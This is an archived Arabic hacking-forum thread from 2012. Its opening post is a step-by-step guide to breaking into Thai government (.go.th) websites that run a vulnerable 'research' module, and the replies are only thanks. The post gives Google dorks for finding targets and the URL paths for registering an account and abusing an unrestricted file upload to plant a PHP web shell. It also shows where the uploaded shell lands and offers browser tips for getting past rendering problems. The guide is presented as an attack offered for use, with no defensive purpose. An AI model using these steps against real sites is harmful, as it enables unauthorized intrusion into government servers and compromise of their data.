:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   ثغرة خطيرة لاختراق المواقع الحكومية (research) (http://www.vbspiders.com/vb/t63232.html)

barbaros 07-06-2012 02:55 PM

ثغرة خطيرة لاختراق المواقع الحكومية (research)
 
السلام عليكم

Dork 1 :
كود:

site:go.th inurl:name=member+file=index
Dork 2:
كود:

site:go.th inurl:name=research
الصفحة الرئيسية:

كود:

http://www.xxx.go.th/?name=research

http://www.xxx.go.th/index.php?name=research

http://www.xxx.go.th/popup.php?name=research



لرفع الشيل اذهب إلى هذا الرابط:

كود:

http://www.xxx.go.th/?name=research&file=add&op=research_add

http://www.xxx.go.th/index.php?name=research&file=add&op=research_add

http://www.xxx.go.th/popup.php?name=research&file=add&op=research_add



إذا ظهرت رسالة الخطأ هذه:
[

التي تهني : "أنت لست عضوا"

يتوجب عليك التسجيل من هذا الرابط:

كود:

 
http://www.xxx.go.th/?name=member&file=index

http://www.xxx.go.th/index.php?name=member&file=index

http://www.xxx.go.th/popup.php?name=member&file=index



لرفع الشيل عليك بملأ الحقول كما في الصورة:

---------------------------------------------------

بعد ذلك ارجع إلى صفحة البداية لترى ملفك:

كود:

http://www.xxx.go.th/?name=research

http://www.xxx.go.th/index.php?name=research

http://www.xxx.go.th/popup.php?name=research



ثم اضغط على "FullText" كما في الصورة:


http://i48.tinypic.com/prsso.jpg
-----------------------------------------------------------------------------

انتظر عشر ثواني:

----------------------------------------------

ثم اضغط على download :


سيتم توجيهك الى رابط الشيل الذي يكون كهذا:

كود:

http://www.xxx.go.th/dontry/data/research_1340954535_z.php

ملاحظة مهمة: في كثير من الأحيان لا تعرض الصفحة بطريقة صحيحة فلا يظهر لك هيكل fckeditor لذا يتوجب عليك استخدام متصفح Opera لتجنب ذلك او استخدام الاضافات ك tamper data او auto fill



بالتوفيق للجميع.

aircrack -ng 07-06-2012 05:38 PM

رد: ثغرة خطيرة لاختراق المواقع الحكومية (research)
 
يعطيك الصحا خو

Mezo Shams 07-06-2012 10:27 PM

رد: ثغرة خطيرة لاختراق المواقع الحكومية (research)
 
يعطيك العافية

WoLF 305 07-06-2012 10:48 PM

رد: ثغرة خطيرة لاختراق المواقع الحكومية (research)
 
يعطيك العافية

ماقصرت


الساعة الآن 05:20 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0